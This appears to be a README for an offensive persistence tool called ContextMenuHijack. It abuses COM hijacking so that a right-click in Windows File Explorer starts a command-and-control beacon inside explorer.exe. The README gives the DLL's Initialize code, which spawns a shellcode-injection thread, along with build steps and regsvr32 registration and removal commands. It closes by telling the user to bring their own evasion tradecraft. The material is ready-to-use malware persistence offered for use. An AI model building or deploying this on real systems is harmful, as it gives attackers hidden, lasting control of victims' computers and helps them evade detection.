This original idea that inspired me is from @NinjaParanoid :
ContextMenuHijack is a simple persistence technique that use COM hijacking based on human behavior, when you right click on a file/folder in the File Explorer to open the Context Menu, it executes at the same time the beacon we specified.
IFACEMETHODIMP FileContextMenuExt::Initialize( LPCITEMIDLIST pidlFolder, LPDATAOBJECT pDataObj, HKEY hKeyProgID ) {
DWORD tid = NULL;
CreateThread(NULL, 1024 * 1024, (LPTHREAD_START_ROUTINE)InjectShc, NULL, 0, &tid);
if (NULL == pDataObj) {
if (pidlFolder != NULL) {
}
return S_OK;
}
return S_OK;
}You just have to load the solution file (.sln) and build it. It's important to know that you need adminstrator privileges to use this persistence technique. Once you have done all of this, you just have to register the DLL file in the registry with regsvr32:
regsvr32 "C:\path\to\ContextMenuHijack.dll"if you want to uninstall it just use
/uflag
regsvr32 /u "C:\path\to\ContextMenuHijack.dll"
- this technique can be easily detected from the thread stack of
explorer.exe, it is up to you to use your own evasion tradecraft